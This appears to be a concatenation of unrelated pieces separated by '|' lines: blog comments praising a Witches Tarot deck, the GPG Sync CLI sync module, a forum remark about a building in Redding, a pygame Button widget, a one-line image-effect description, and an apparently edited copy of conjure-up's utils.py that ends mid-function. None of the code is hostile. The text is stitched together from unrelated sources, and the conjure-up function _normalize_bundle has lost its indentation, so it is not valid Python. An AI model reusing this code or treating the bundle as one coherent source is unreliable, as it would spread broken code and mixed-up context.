Just today I found a lovely comment on the card image of the Page of Pentacles, from a Facebook follower thanking me, "for including brown-skinned Witches in the deck!" That their favorite decks "are the ones that represent people of all ethnicities in them." Which just made my day.
Witches come in all beautiful shapes, sizes, and colors. I hope that with the Witches Tarot deck, everyone will find something to relate to and identify with. So they can make it their own.
May the Mother Goddess smile down on us, reminding us that we are indeed all her children!
The cards are really gorgeous. Great work !
Have a magical day and I hope Llewellyn will accept your book proposal.
There is always going to be someone just itching to complain about everything. At least this person checked back and revised his/her stance. I finally broke down and ordered the deck. Can't wait to see them and get a feel for using them.
The design on the back will make reversed cards stand out. This puts me off the deck.
Well, it takes courage to admit you're wrong (especially in such an anonymous environment such as the internet) so it's nice that they took the time to reflect on their opinion.
This is really a beautiful deck of cards. I love to buy this deck of Tarot cards.
You have a nice psychic site here, I like the color and positive energy you put into it. Great work.
|
# -*- coding: utf-8 -*-
"""
GPG Sync
Helps users have up-to-date public keys for everyone in their organization
https://github.com/firstlookmedia/gpgsync
Copyright (C) 2016 First Look Media
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import queue
import threading
import time
import sys
from .keylist import Keylist, RefresherMessageQueue
def worker(common, keylist, force, status):
    """
    Sync a single keylist, to be run in a separate thread.

    The refresh outcome is recorded both on the keylist itself and in the
    shared status dict under the keylist's id.
    """
    # The refresher supports cancellation via a queue; a CLI sync never
    # cancels, so hand it a fresh, unused queue.
    cancel_queue = queue.Queue()
    outcome = Keylist.refresh(common, cancel_queue, keylist, force=force)
    keylist.interpret_result(outcome)
    status[keylist.id]['result'] = outcome
def sync(common, force=False):
    """
    Sync all keylists.

    Spawns one worker thread per keylist, polls each keylist's message
    queue for progress events, renders a single-line progress display,
    and prints a per-keylist summary when everything has finished.

    :param common: shared application state (settings, version, ...)
    :param bool force: forwarded to Keylist.refresh to force a sync
    """
    print("GPG Sync {}\n".format(common.version))
    num_keylists = len(common.settings.keylists)
    # Status is a dictionary where keys are the keylist "id", a
    # concatenation of the keylist fingerprint and URL (both bytes)
    status = {}
    ids = []  # ordered list of ids, so the display order is stable
    # Build the status object, and display keylist indexes
    for i in range(num_keylists):
        keylist = common.settings.keylists[i]
        keylist.id = keylist.fingerprint + b':' + keylist.url
        ids.append(keylist.id)
        status[keylist.id] = {
            "index": i,       # position used in the printed "[N]" label
            "event": None,    # last in-progress event seen from the worker
            "str": None,      # rendered progress string for display
            "result": None,   # set by worker() when the refresh finishes
            "keylist": keylist
        }
        print("[{}] Keylist {}, with authority key {}".format(i, keylist.url.decode(), keylist.fingerprint.decode()))
    print("")
    # Start threads
    threads = []
    for keylist in common.settings.keylists:
        keylist.q = RefresherMessageQueue()
        t = threading.Thread(target=worker, args=(common, keylist, force, status,))
        threads.append(t)
        t.start()
    # Monitor queues for updates
    while True:
        # Pull at most one event per keylist per pass; only in-progress
        # events update the display state
        for keylist in common.settings.keylists:
            try:
                event = keylist.q.get(False)
                if event['status'] == RefresherMessageQueue.STATUS_IN_PROGRESS:
                    status[keylist.id]['event'] = event
            except queue.Empty:
                pass
        # Display: one "[N] cur/total (pct%)" chunk per keylist on one line
        for id in ids:
            if not status[id]['event']:
                status[id]['str'] = '[{0:d}] Syncing...'.format(status[id]['index'])
            else:
                percent = (status[id]['event']['current_key'] / status[id]['event']['total_keys']) * 100;
                status[id]['str'] = '[{0:d}] {1:d}/{2:d} ({3:d}%)'.format(
                    status[id]['index'],
                    status[id]['event']['current_key'],
                    status[id]['event']['total_keys'],
                    int(percent))
        # '\r' rewinds so the next pass overwrites the same line
        sys.stdout.write('{} \r'.format(' '.join([status[id]['str'] for id in ids])))
        # Are all keylists finished syncing?
        done = True
        for id in ids:
            if not status[id]['result']:
                done = False
                break
        if done:
            sys.stdout.write('\n\n')
            break
        else:
            # Wait a bit before checking for updates again
            time.sleep(1)
    # Make sure all threads are finished
    for t in threads:
        t.join()
    # Display the results, one summary line per keylist
    for id in ids:
        result = status[id]['result']
        keylist = status[id]['keylist']
        if result['type'] == 'success':
            if keylist.warning:
                print("[{0:d}] Sync successful. Warning: {1:s}".format(status[id]['index'], keylist.warning))
            else:
                print("[{0:d}] Sync successful.".format(status[id]['index']))
        elif result['type'] == 'error':
            print("[{0:d}] Sync failed. Error: {1:s}".format(status[id]['index'], keylist.error))
        elif result['type'] == 'cancel':
            print("[{0:d}] Sync canceled.".format(status[id]['index']))
        elif result['type'] == 'skip':
            print("[{0:d}] Sync skipped. (Use --force to force syncing.)".format(status[id]['index']))
        else:
            print("[{0:d}] Unknown problem with sync.".format(status[id]['index']))
|
That building there is an actual building in Redding (I know STX got the image for it from Google Maps) called the SMART Center, a place to help people find a job (where she's dropping down is the other side of the building, where the Department of Health and Social Services is). That would make the bank that was robbed the Bank of America in downtown Redding. Just thought that information would be interesting.
|
from __future__ import absolute_import
import os
import pygame
from pygameui.widget import Widget
buttonbgpath = os.path.join("images", "gui", "buttonbg.png")
class Button(Widget):
    """Button Widget: a clickable label, optionally drawn over a custom
    background image.

    Without ``bgimage`` the label is rendered on top of the default
    background (images/gui/buttonbg.png), scaled to the widget size.
    """
    def __init__(self, label, position, bgimage=None, labelsize=12,
                 color=(255, 255, 0)):
        # NOTE: pygame.font must already be initialized, since a Font is
        # loaded here; the working directory must contain the font file.
        self.bgimage = bgimage
        self.label = label
        self.color = color
        self.position = position
        self.labelsize = labelsize
        self.labelfont = pygame.font.Font("dejavusansmono.ttf", self.labelsize)
        self.buttonbgorg = pygame.image.load(buttonbgpath).convert_alpha()
        self.buttonbg = self.buttonbgorg.copy()
        # Setup image; self.width/self.height are presumably set by
        # _setsize inherited from Widget — TODO confirm
        if not self.bgimage:
            self._settextimage()
        else:
            self._setsize(self._calculate_size(self.bgimage))
        Widget.__init__(self, self.position, self.width, self.height)

    def _render_text(self):
        """Render the label text (non-antialiased) in the button color.

        :return: an alpha-converted pygame surface with the label
        """
        img = self.labelfont.render(self.label, 0, self.color)
        return img.convert_alpha()

    @staticmethod
    def _calculate_size(image):
        """Return (width, height) for *image*, with 4px of extra width
        to leave room for the 2px x-offset used when blitting text.

        :param image: pygame surface to measure
        :return: (width, height) tuple
        """
        width = image.get_size()[0] + 4
        height = image.get_size()[1]
        return (width, height)

    def _settextimage(self):
        """Re-render the label and resize the widget to fit the text.

        :return: None
        """
        self.image = self._render_text()
        self._setsize(self._calculate_size(self.image))

    def setimage(self, newimage):
        """Replace the button's image, resize to fit, and repaint.

        :param newimage: pygame surface to use as the button image
        :return: None
        """
        self.image = newimage
        self._setsize(self._calculate_size(self.image))
        self.repaint()

    def repaint(self):
        """Redraw the button into its widget surface (self.img).

        :return: None
        """
        self.create_widget_image()
        if self.label and self.bgimage:
            img = self._render_text()
            # NOTE(review): the text is blitted first and the background
            # image on top of it, so an opaque bgimage will cover the
            # label — confirm bgimage is expected to be transparent here.
            self.img.blit(img, (2, 0))
            self.img.blit(self.bgimage, (0, 0))
        elif not self.bgimage:
            # scale the default background to the current widget size
            img = pygame.transform.smoothscale(self.buttonbgorg, self.size)
            self.buttonbg = img
            self.img.blit(self.buttonbg, (0, 0))
            self.img.blit(self.image, (2, 0))
        elif not self.label and self.bgimage:
            self.img.blit(self.bgimage, (0, 0))
        # draw an underline along the bottom edge on hover
        if self.insidewidget:
            pygame.draw.line(self.img, self.color, (1, self.height - 1),
                             (self.width, self.height - 1))
        # mark modified so the parent knows to redraw us
        self.mark_modified()

    def settext(self, newtext):
        """Change the label text, resize to fit, and repaint.

        :param newtext: new label string
        :return: None
        """
        self.label = newtext
        self._settextimage()
        self.repaint()

    def poll_event(self, event):
        """Handle a pygame event: fire click callbacks and make the
        button active on a left mouse button press inside the widget.

        :param event: pygame event object
        :return: None
        """
        Widget.poll_event(self, event)
        pos = self.parent.get_relative_mousepos()
        # mouse button down (button 1 == left click)
        if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1 and pos\
                and self.pointinwidget(pos[0], pos[1]):
            # on_click event: fire both callback names for compatibility
            self.call_callback("clicked")
            self.call_callback("onclick")
            # make button active
            if self.parent:
                self.parent.makeactive(self)
|
Represents an Alpha Ceiling effect. Alpha (opacity) values greater than zero are changed to 100%. In other words, anything partially opaque becomes fully opaque.
|
import asyncio
import codecs
import errno
import json
import logging
import os
import pty
import re
import shutil
import socket
import subprocess
import sys
import uuid
from collections import Mapping
from contextlib import contextmanager
from functools import partial
from itertools import chain
from pathlib import Path
from subprocess import PIPE, Popen, check_call, check_output
import aiofiles
from pkg_resources import parse_version
from raven.processors import SanitizePasswordsProcessor
from termcolor import cprint
from conjureup import consts
from conjureup.app_config import app
from conjureup.models.metadata import SpellMetadata
from conjureup.telemetry import track_event
@contextmanager
def chdir(directory):
    """Temporarily change the working directory for a code block.

    Restores the previous working directory when the block exits,
    even on error. Useful to run commands from a specific directory.

    :param str directory: The directory path to change to for this context.
    """
    previous = os.getcwd()
    os.chdir(directory)
    try:
        yield
    finally:
        os.chdir(previous)
def run(cmd, **kwargs):
    """Compatibility wrapper to support Python 3.4.

    Uses subprocess.run when available; otherwise falls back to
    check_call (when 'check' was requested) or check_output.
    """
    try:
        from subprocess import run as _run
        return _run(cmd, **kwargs)
    except ImportError:
        # Python 3.4 fallback: the legacy helpers don't accept 'check'
        if 'check' not in kwargs:
            return check_output(cmd, **kwargs)
        kwargs.pop('check')
        return check_call(cmd, **kwargs)
def run_script(path, stderr=PIPE, stdout=PIPE):
    """Run *path* through the shell with the conjure-up environment.

    :param path: shell command string (passed with shell=True)
    :param stderr: where to send stderr (default: captured via PIPE)
    :param stdout: where to send stdout (default: captured via PIPE)
    :returns: whatever run() returns (CompletedProcess on Python >= 3.5)
    """
    return run(path, shell=True, stderr=stderr, stdout=stdout, env=app.env)
def run_attach(cmd, output_cb=None):
    """Run a shell command on a pty and stream its output.

    Arguments:
    cmd: shell command string (run with shell=True)
    output_cb: optional callback, invoked with roughly the last ten
        lines of decoded output every time new output arrives

    Returns:
    The complete decoded stdout, stripped, when the command exits 0.

    Raises:
    Exception: when the command exits non-zero; the message includes
        the exit code and the captured stderr.
    """
    stdoutmaster, stdoutslave = pty.openpty()
    subproc = Popen(cmd, shell=True,
                    stdout=stdoutslave,
                    stderr=PIPE)
    os.close(stdoutslave)
    decoder = codecs.getincrementaldecoder('utf-8')()

    def last_ten_lines(s):
        # Only inspect the tail of the output so this stays cheap
        chunk = s[-1500:]
        lines = chunk.splitlines(True)
        return ''.join(lines[-10:]).replace('\r', '')

    decoded_output = ""
    try:
        while subproc.poll() is None:
            try:
                b = os.read(stdoutmaster, 512)
            except OSError as e:
                # EIO means the slave end closed (process exited);
                # anything else is a real error
                if e.errno != errno.EIO:
                    raise
                break
            else:
                final = False
                if not b:
                    final = True
                decoded_chars = decoder.decode(b, final)
                if decoded_chars is None:
                    continue
                decoded_output += decoded_chars
                if output_cb:
                    ls = last_ten_lines(decoded_output)
                    output_cb(ls)
                if final:
                    break
    finally:
        os.close(stdoutmaster)
        if subproc.poll() is None:
            subproc.kill()
        subproc.wait()
    errors = [l.decode('utf-8') for l in subproc.stderr.readlines()]
    if output_cb:
        output_cb(last_ten_lines(decoded_output))
    errors = ''.join(errors)
    if subproc.returncode == 0:
        return decoded_output.strip()
    else:
        # BUG FIX: the format string had three placeholders but was only
        # given two arguments, so raising this previously crashed with an
        # IndexError and the captured stderr was never reported.
        raise Exception("Problem running {0} "
                        "{1}:{2}".format(cmd,
                                         subproc.returncode,
                                         errors))
async def arun(cmd, input=None, check=False, env=None, encoding='utf8',
               stdin=PIPE, stdout=PIPE, stderr=PIPE, cb_stdout=None,
               cb_stderr=None, **kwargs):
    """ Run a command using asyncio.
    If ``stdout`` or ``stderr`` are strings, they will be treated as
    filenames and the data from the process will be written (streamed) to
    them. In this case, ``cb_stdout`` and ``cb_stderr`` can be given as
    callbacks to call with each line from the respective handle.

    :param list cmd: List containing the command to run, plus any args.
    :param input: data fed to the child's stdin (str is encoded with
        *encoding*)
    :param bool check: raise CalledProcessError on non-zero exit
    :param dict env: extra environment variables, layered over app.env
    :param str encoding: encoding used to decode the child's output
    :param cb_stdout: per-line callback for stdout (file-sink mode only)
    :param cb_stderr: per-line callback for stderr (file-sink mode only)
    :param dict **kwargs: passed through to create_subprocess_exec
    :returns: tuple (returncode, stdout_data, stderr_data); the data
        fields are None when the corresponding stream was not captured
    :raises subprocess.CalledProcessError: when check is True and the
        process exits non-zero
    """
    # Caller-supplied env entries override the app-wide environment
    env = dict(app.env, **(env or {}))
    outf = None
    errf = None
    try:
        # When given filenames, still capture via PIPE and stream the
        # data into the opened files ourselves
        if isinstance(stdout, str):
            outf = await aiofiles.open(stdout, 'w')
            stdout = PIPE
        if isinstance(stderr, str):
            errf = await aiofiles.open(stderr, 'w')
            stderr = PIPE
        proc = await asyncio.create_subprocess_exec(*cmd,
                                                    stdin=stdin,
                                                    stdout=stdout,
                                                    stderr=stderr,
                                                    env=env,
                                                    **kwargs)
        data = {}

        async def tstream(source_name, sink, ui_cb):
            # Stream lines from proc.stdout / proc.stderr, fanning each
            # line out to the UI callback, the accumulated data dict, and
            # the optional file sink
            source = getattr(proc, source_name)
            while proc.returncode is None:
                async for line in source:
                    line = line.decode(encoding)
                    if ui_cb:
                        ui_cb(line)
                    data.setdefault(source_name, []).append(line)
                    if sink:
                        await sink.write(line)
                        await sink.flush()
                await asyncio.sleep(0.01)

        tasks = []
        if input:
            if isinstance(input, str):
                input = input.encode(encoding)
            # NOTE(review): _feed_stdin is a private asyncio API — may
            # break on newer Python versions; confirm before upgrading
            tasks.append(proc._feed_stdin(input))
        if proc.stdout:
            tasks.append(tstream('stdout', outf, cb_stdout))
        if proc.stderr:
            tasks.append(tstream('stderr', errf, cb_stderr))
        await asyncio.gather(*tasks)
        await proc.wait()
    finally:
        if outf:
            await outf.close()
        if errf:
            await errf.close()
    # NOTE(review): if create_subprocess_exec (or opening a sink) raises,
    # ``proc`` is unbound here and this would raise NameError — confirm
    # intended behavior
    stdout_data = ''.join(data.get('stdout', [])) if proc.stdout else None
    stderr_data = ''.join(data.get('stderr', [])) if proc.stderr else None
    if check and proc.returncode != 0:
        raise subprocess.CalledProcessError(proc.returncode,
                                            cmd, stdout_data, stderr_data)
    return (proc.returncode, stdout_data, stderr_data)
def sentry_report(message=None, exc_info=None, tags=None, **kwargs):
    """Queue a Sentry report in a worker thread so the event loop
    never blocks on network I/O; see _sentry_report for semantics."""
    job = partial(_sentry_report, message, exc_info, tags, **kwargs)
    app.loop.run_in_executor(None, job)
def _sentry_report(message=None, exc_info=None, tags=None, **kwargs):
    """Build and send a Sentry event (blocking; run via sentry_report).

    Sends a Message event (default level WARNING) when only *message* is
    given, otherwise an Exception event (default level ERROR), defaulting
    to the currently-handled exception when exc_info is None or True.
    Honors the user's opt-out (app.no_report) and never raises.
    """
    if app.no_report:
        return
    try:
        # Tags attached to every event to aid triage
        default_tags = {
            'spell': app.config.get('spell'),
            'cloud_type': app.provider.cloud_type if app.provider else None,
            'region': app.provider.region if app.provider else None,
            'jaas': app.is_jaas,
            'headless': app.headless,
            'juju_version': juju_version()
        }
        if message is not None and exc_info is None:
            event_type = 'raven.events.Message'
            kwargs['message'] = message
            if 'level' not in kwargs:
                kwargs['level'] = logging.WARNING
        else:
            event_type = 'raven.events.Exception'
            if exc_info is None or exc_info is True:
                # capture the exception currently being handled
                kwargs['exc_info'] = sys.exc_info()
            else:
                kwargs['exc_info'] = exc_info
            if 'level' not in kwargs:
                kwargs['level'] = logging.ERROR
        # explicit tags win over the defaults
        kwargs['tags'] = dict(default_tags, **(tags or {}))
        app.sentry.capture(event_type, **kwargs)
    except Exception:
        # reporting must never break the application
        pass
async def can_sudo(password=None):
    """Check whether sudo can run without prompting the user.

    Runs ``sudo /bin/true`` — with the given (or remembered) password
    piped to stdin, or non-interactively when no password is known.

    :returns: True when sudo succeeded (exit code 0)
    """
    if not password and app.sudo_pass:
        password = app.sudo_pass
    if password:
        sudo_flag = '-S'   # read the password from stdin
        stdin_data = '{}\n'.format(password).encode('utf8')
    else:
        sudo_flag = '-n'   # non-interactive: fail instead of prompting
        stdin_data = None
    proc = await asyncio.create_subprocess_exec('sudo', sudo_flag, '/bin/true',
                                                stdin=subprocess.PIPE,
                                                stdout=subprocess.DEVNULL,
                                                stderr=subprocess.DEVNULL)
    if stdin_data:
        await proc.communicate(stdin_data)
    else:
        await proc.wait()
    return proc.returncode == 0
def juju_version():
    """Get the current Juju version.

    Runs ``juju version`` and parses its output.

    :raises Exception: when the juju binary exits non-zero
    """
    proc = run_script('{} version'.format(app.juju.bin_path))
    if proc.returncode != 0:
        raise Exception("Could not determine Juju version.")
    return parse_version(proc.stdout.decode().strip())
def snap_version():
    """Get the installed snapd version as a parsed version object.

    Returns None when the ``snap version`` command fails (snap not
    installed), preserving the previous implicit fall-through.

    :raises Exception: when the command output cannot be parsed
    """
    cmd = run_script('snap version')
    if cmd.returncode != 0:
        # snap isn't available; keep the historical None result
        return None
    name_version_str = cmd.stdout.decode().splitlines()[0]
    try:
        name, version = name_version_str.split()
        if '~' in version:
            # strip the distro series suffix, e.g. "2.32~14.04"
            version, series = version.split('~')
        return parse_version(version)
    except ValueError as e:
        # was a bare ``except:``, which also swallowed SystemExit and
        # KeyboardInterrupt and discarded the original cause
        raise Exception("Could not determine Snap version.") from e
def send_msg(msg, label, color, attrs=['bold']):
    """Print a labelled message, colorized when appropriate.

    Arguments:
    msg: text to display
    label: short tag such as 'info' or 'error'
    color: termcolor color name for the label
    attrs: termcolor attributes applied to the label
    """
    color_mode = app.conjurefile['color']
    if color_mode == 'auto':
        # only colorize when the real stdout is a terminal
        colorized = sys.__stdout__.isatty()
    else:
        colorized = color_mode == 'always'
    if app.conjurefile['debug']:
        # debug output stays plain (and unflushed)
        print("[{}] {}".format(label, msg))
    elif colorized:
        cprint("[{}] ".format(label),
               color,
               attrs=attrs,
               end="{}\n".format(msg), flush=True)
    else:
        print("[{}] {}".format(label, msg), flush=True)
def info(msg):
    """Print *msg* with the green 'info' label."""
    send_msg(msg, 'info', 'green')


def error(msg):
    """Print *msg* with the red 'error' label."""
    send_msg(msg, 'error', 'red')


def warning(msg):
    """Print *msg* with the yellow 'warning' label."""
    send_msg(msg, 'warning', 'yellow')
def install_home():
    """ returns installer user home
    Expands "~<user>" for the username returned by install_user().
    """
    return os.path.expanduser("~" + install_user())
def juju_path():
    """Return the Juju data directory.

    Honors $JUJU_DATA when set, otherwise falls back to the standard
    ~/.local/share/juju location.
    """
    default = os.path.expanduser('~/.local/share/juju')
    return os.getenv('JUJU_DATA', default)
def mkdir(path):
    """Create *path* (and any parents) if missing, then chown it to the
    installing user; no-op when the directory already exists."""
    if os.path.isdir(path):
        return
    os.makedirs(path)
    chown(path, install_user(), recursive=True)
def _normalize_bundle(original_bundle, overlay_bundle):
""" Normalizes top level application/services keys
"""
if 'applications' in original_bundle and 'services' in overlay_bundle:
overlay_bundle['applications'] = overlay_bundle.pop('services')
if 'services' in original_bundle and 'applications' in overlay_bundle:
overlay_bundle['services'] = overlay_bundle.pop('applications')
def merge_dicts(*dicts):
    """
    Return a new dictionary that is the result of merging the arguments
    together.

    Mappings are merged recursively; list/tuple values are concatenated
    (scalars are promoted to one-element lists first). For anything else,
    later arguments take precedence over earlier arguments.

    ref: http://stackoverflow.com/a/8795331/3170835

    NOTE: ``Mapping`` comes from the file's ``from collections import
    Mapping`` — that alias moved to collections.abc and was removed in
    Python 3.10.
    """
    merged = {}
    all_keys = set()
    for src in dicts:
        all_keys |= set(src)
    for key in all_keys:
        present = [src[key] for src in dicts if key in src]
        mappings = [v for v in present if isinstance(v, Mapping)]
        if mappings:
            # mapping values win and are merged recursively
            merged[key] = merge_dicts(*mappings)
            continue
        if any(isinstance(v, (list, tuple)) for v in present):
            # merge list-likes (non-recursively), promoting scalars
            as_lists = [v if isinstance(v, (list, tuple)) else [v]
                        for v in present]
            merged[key] = list(chain.from_iterable(as_lists))
            continue
        # otherwise the last value wins
        merged[key] = present[-1]
    return merged
def subtract_dicts(*dicts):
    """
    Return a new dictionary that is the result of subtracting each dict
    from the previous.

    For non-mapping removal values, the matching key is simply removed.
    For mapping values only the sub-keys are removed, recursively. For
    list/tuple values the matching items are removed from the original
    list; keys whose value becomes empty are dropped entirely.
    """
    result = merge_dicts(dicts[0], {})  # deep copy of the first dict
    for src in dicts[1:]:
        for key, removal in src.items():
            if key not in result:
                continue
            current = result[key]
            if isinstance(removal, Mapping):
                pruned = subtract_dicts(current, removal)
                if pruned:
                    result[key] = pruned
                else:
                    # everything was removed from the mapping
                    del result[key]
            elif isinstance(removal, (list, tuple)):
                if not isinstance(current, (list, tuple)):
                    # scalar original: drop it if it appears in the list
                    if current in removal:
                        del result[key]
                else:
                    kept = [item for item in current
                            if item not in removal]
                    if kept:
                        result[key] = kept
                    else:
                        # everything was removed from the list
                        del result[key]
            else:
                del result[key]
    return result
def chown(path, user, group=None, recursive=False):
    """ Change user/group ownership of file
    Arguments:
    path: path of file or directory
    user: new owner username
    group: new owner group name (defaults to *user* when omitted)
    recursive: set files/dirs recursively
    Raises:
    OSError (and LookupError from shutil.chown) propagate unchanged.
    """
    if group is None:
        group = user
    # The previous version wrapped this in ``except OSError as e:
    # raise e``, which just re-raised the same exception; errors now
    # propagate naturally with their original traceback.
    if not recursive or os.path.isfile(path):
        shutil.chown(path, user, group)
    else:
        for root, dirs, files in os.walk(path):
            shutil.chown(root, user, group)
            for item in dirs:
                shutil.chown(os.path.join(root, item), user, group)
            for item in files:
                shutil.chown(os.path.join(root, item), user, group)
def spew(path, data, owner=None):
    """ Writes data to path
    Arguments:
    path: path of file to write to
    data: contents to write
    owner: optional owner of file
    Raises:
    Exception: when ownership could not be set (with the underlying
        error chained as the cause)
    """
    with open(path, 'w') as f:
        f.write(data)
    if owner:
        try:
            chown(path, owner)
        except Exception as e:
            # was a bare ``except:`` that discarded the original cause;
            # chain it so the real failure is visible in the traceback
            raise Exception(
                "Unable to set ownership of {}".format(path)) from e
def slurp(path):
    """ Reads data from path
    Arguments:
    path: pathlib.Path of the file to read
    Returns:
    The file contents with surrounding whitespace stripped.
    Raises:
    IOError/OSError: propagated unchanged. (The previous version
        caught IOError and raised a NEW, empty IOError, destroying
        the errno and message of the original failure.)
    """
    with path.open() as f:
        return f.read().strip()
def install_user():
    """Return the current username from the $USER environment variable.

    Raises:
    Exception: when $USER is not set.
    """
    user = os.environ.get('USER')
    if user is None:
        raise Exception("Unable to determine current user.")
    return user
def set_chosen_spell(spell_name, spell_dir):
    """Record the user's chosen spell in telemetry, the process
    environment, and the app config.

    :param str spell_name: name of the selected spell
    :param spell_dir: directory containing the spell
    """
    track_event("Spell Choice", spell_name, "")
    app.env['CONJURE_UP_SPELL'] = spell_name
    app.config.update({'spell-dir': spell_dir,
                       'spell': spell_name})
def set_spell_metadata():
    """Load metadata.yaml from the configured spell dir into app.metadata."""
    app.metadata = SpellMetadata.load(
        Path(app.config['spell-dir']) / 'metadata.yaml')
def get_spell_metadata(spell):
    """ Returns metadata about spell
    Loads <spells-dir>/<spell>/metadata.yaml into a SpellMetadata object.

    :param str spell: spell key/name
    """
    metadata_path = Path(app.config['spells-dir']) / spell / 'metadata.yaml'
    return SpellMetadata.load(metadata_path)
def __available_on_darwin(key):
    """Return True when the spell *key* can run on macOS.

    Localhost-only (LXD) spells and snap spells are Linux-only.
    """
    metadata = get_spell_metadata(key)
    localhost_only = (metadata.cloud_whitelist and
                      'localhost' in metadata.cloud_whitelist)
    snap_spell = metadata.spell_type == consts.spell_types.SNAP
    return not (localhost_only or snap_spell)
def find_spells():
    """Find all spells, excluding those unavailable on macOS (localhost
    only and snap spells) when running on Darwin.

    :returns: list of (category, spell_dict) tuples
    """
    return [(category, sd)
            for category, cat_dict in app.spells_index.items()
            for sd in cat_dict['spells']
            if not (is_darwin() and not __available_on_darwin(sd['key']))]
def find_addons_matching(key):
    """Return the addons registered under alias *key*, or {} if none."""
    return app.addons_aliases.get(key, {})
def find_spells_matching(key):
    """Find spells matching *key*.

    When *key* is a category, every visible spell in that category is
    returned; otherwise the index is searched for a spell with that key.
    Spells unavailable on macOS are filtered out on Darwin.

    :returns: list of (category, spell_dict) tuples (possibly empty)
    """
    def visible(spell_key):
        return not is_darwin() or __available_on_darwin(spell_key)

    if key in app.spells_index:
        return [(key, sd)
                for sd in app.spells_index[key]['spells']
                if visible(sd['key'])]
    for category, d in app.spells_index.items():
        for spell in d['spells']:
            if spell['key'] == key and visible(spell['key']):
                return [(category, spell)]
    return []
def get_options_whitelist(service_name):
    """Return the list of whitelisted option names for *service_name*.

    Returns [] when there is no spell metadata or no whitelist.
    """
    metadata = app.metadata
    if metadata is None or metadata.options_whitelist is None:
        return []
    return metadata.options_whitelist.get(service_name, [])
def gen_hash():
    """Return a short random identifier: the first three hex digits of
    a freshly generated UUID4."""
    return uuid.uuid4().hex[:3]
def gen_model():
    """Generate a probably-unique Juju model name derived from the
    current spell, truncated to fit naming limits."""
    base = "conjure-{}".format(app.env['CONJURE_UP_SPELL'])
    return "{}-{}".format(base[:24], gen_hash())
def gen_cloud():
    """Generate a probably-unique cloud name derived from the provider's
    cloud type, truncated to fit naming limits."""
    base = "cloud-{}".format(app.provider.cloud_type)
    return "{}-{}".format(base[:24], gen_hash())
def is_darwin():
    """ Checks if host platform is macOS
    :returns: bool
    """
    return sys.platform.startswith('darwin')


def is_linux():
    """ Checks if host platform is linux
    :returns: bool
    """
    return sys.platform.startswith('linux')
def is_valid_hostname(hostname):
    """ Checks if a hostname is valid
    Graciously taken from http://stackoverflow.com/a/2532344/3170835

    Labels may be 1-63 chars of letters/digits/hyphen/underscore and may
    not start or end with a hyphen; total length is capped at 255.

    :param str hostname: hostname to validate
    :returns: bool
    """
    # BUG FIX: an empty string previously crashed with IndexError on
    # ``hostname[-1]``; it is now rejected explicitly.
    if not hostname or len(hostname) > 255:
        return False
    if hostname[-1] == ".":
        # strip exactly one dot from the right, if present (FQDN form)
        hostname = hostname[:-1]
    allowed = re.compile(r"(?!-)[A-Z\d\-\_]{1,63}(?<!-)$", re.IGNORECASE)
    return all(allowed.match(x) for x in hostname.split("."))
def set_terminal_title(title):
    """ Sets the terminal title
    Writes the xterm OSC 2 escape sequence (ESC ] 2 ; title BEL) to
    stdout; terminals that don't support it simply ignore it.
    """
    sys.stdout.write("\x1b]2;{}\x07".format(title))
def get_physical_network_interfaces():
    """ Returns a sorted list of physical network interface names.
    We whitelist eth due to some instances where users run
    conjure-up inside a single LXD container. At that point
    all devices are considered virtual and all network device
    naming follows the ethX pattern.
    Raises:
    Exception: when no suitable interface with an IPv4 address exists.
    """
    sys_class_net = Path('/sys/class/net')
    devices = []
    for device in sys_class_net.glob("*"):
        # Resolving the sysfs symlink reveals whether the kernel
        # considers the device virtual (path contains "virtual")
        parts = str(device.resolve()).split('/')
        if "virtual" in parts and not parts[-1].startswith('eth'):
            continue
        try:
            # Only keep interfaces that currently have an IPv4 address
            if not get_physical_network_ipaddr(device.name):
                continue
        except Exception:
            continue
        devices.append(device.name)
    if len(devices) == 0:
        raise Exception(
            "Could not find a suitable physical network interface "
            "to create a LXD bridge on. Please check your network "
            "configuration.")
    return sorted(devices)
def get_physical_network_ipaddr(iface):
    """ Gets an IP Address for network device, ipv4 only
    Arguments:
    iface: interface to query
    Returns:
    The first IPv4 address string found for *iface*, or None when the
    interface has no 'inet ' entry.
    Raises:
    Exception: when the ``ip addr show`` command fails.
    """
    out = run_script('ip addr show {}'.format(iface))
    if out.returncode != 0:
        raise Exception(
            "Could not determine an IPv4 address for {}".format(iface))
    app.log.debug("Parsing {} for IPv4 address".format(
        out.stdout.decode('utf8')))
    try:
        # naive parse: the text between the first 'inet ' and its '/'
        ipv4_addr = out.stdout.decode(
            'utf8').split('inet ')[1].split('/')[0]
    except IndexError:
        return None
    return ipv4_addr
def get_open_port():
    """Return an unused TCP port number.

    Binds an ephemeral port, reads its number, and releases it. Note
    the usual race: the port could be taken before the caller binds it.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.bind(("", 0))
        sock.listen(1)
        return sock.getsockname()[1]
class IterQueue(asyncio.Queue):
    """
    Queue subclass that supports the ``async for`` syntax.

    When the producer is done adding items, it must call `close` to
    notify the consumer.

    Example::

        queue = IterQueue()

        async def consumer():
            async for line in queue:
                print(line)

        async def producer():
            with open('filename') as fp:
                for line in fp:
                    await queue.put(line)
            await queue.close()
    """
    def __init__(self, *args, **kwargs):
        # Unique end-of-stream marker, compared by identity in __anext__.
        # (The attribute keeps its historical spelling "sentinal" since
        # it is part of the instance's public state.)
        self.sentinal = []
        super().__init__(*args, **kwargs)

    def __aiter__(self):
        return self

    async def __anext__(self):
        # Blocks until an item is available; the sentinel ends the loop.
        item = await self.get()
        if item is self.sentinal:
            raise StopAsyncIteration
        return item

    async def close(self):
        # Signal end-of-stream to the consumer.
        await self.put(self.sentinal)
class SanitizeDataProcessor(SanitizePasswordsProcessor):
    """
    Sanitize data sent to Sentry.

    Performs the same sanitizations as the SanitizePasswordsProcessor,
    but also sanitizes values (recursively, for containers).
    """
    def sanitize(self, key, value):
        """Return *value* with anything that looks sensitive masked.

        Strings/bytes containing any of self.KEYS are replaced with a
        masking placeholder; containers are sanitized recursively; other
        values are checked via their JSON encoding.
        """
        value = super().sanitize(key, value)
        if value is None:
            return value

        def _check_str(s):
